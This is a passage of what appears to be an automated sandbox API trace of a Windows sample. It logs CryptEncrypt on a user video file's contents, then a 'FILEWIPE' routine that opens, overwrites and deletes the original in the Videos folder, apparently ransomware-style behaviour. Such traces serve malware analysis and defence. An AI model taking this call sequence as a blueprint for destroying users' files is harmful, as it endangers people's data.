wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.713] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.713] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.713] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.713] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.714] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14221, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14230) returned 1 [0041.714] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.714] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.714] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.714] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.714] CharLowerBuffW (in: lpsz="byte[82481]", cchLength=0xb | out: lpsz="byte[82481]") returned 0xb [0041.714] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.716] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.717] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.718] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95d468*, pdwDataLen=0x6ae220*=0x14221, dwBufLen=0x14230 | out: pbData=0x95d468*, pdwDataLen=0x6ae220*=0x14230) returned 1 [0041.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.722] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.723] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.723] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.723] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.723] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.731] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.731] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.731] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.736] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.736] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.736] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.736] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.736] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.736] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.736] CryptDestroyKey (hKey=0x7c2280) returned 1 [0041.736] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.736] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.736] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.736] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.736] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.737] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.737] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.737] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.737] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.737] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.737] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.737] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.737] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.738] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.738] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.738] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.738] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.738] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.738] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.738] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.738] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.739] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.739] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.739] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.739] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.739] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b24390, ftCreationTime.dwHighDateTime=0x1d5b968, ftLastAccessTime.dwLowDateTime=0x8e9c0710, ftLastAccessTime.dwHighDateTime=0x1d5c585, ftLastWriteTime.dwLowDateTime=0x8e9c0710, ftLastWriteTime.dwHighDateTime=0x1d5c585, nFileSizeHigh=0x0, nFileSizeLow=0x14221, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2hbnq.avi", cAlternateFileName="")) returned 0x7c2100 [0041.740] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.740] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.740] CharLowerBuffW (in: lpsz="byte[82465]", cchLength=0xb | out: lpsz="byte[82465]") returned 0xb [0041.740] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.740] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.740] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.740] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.740] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.741] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.741] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.741] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.742] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.742] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2hbnq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0041.743] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.743] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.743] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.743] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.743] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.744] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.744] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.744] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.744] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.744] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.744] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.744] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi", lpFilePart=0x0) returned 0x2e [0041.744] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b24390, ftCreationTime.dwHighDateTime=0x1d5b968, ftLastAccessTime.dwLowDateTime=0x8e9c0710, ftLastAccessTime.dwHighDateTime=0x1d5c585, ftLastWriteTime.dwLowDateTime=0x1896e400, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14221, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="2hbnq.avi", cAlternateFileName="")) returned 0x7c2100 [0041.744] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2hbnq.avi")) returned 1 [0041.746] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, 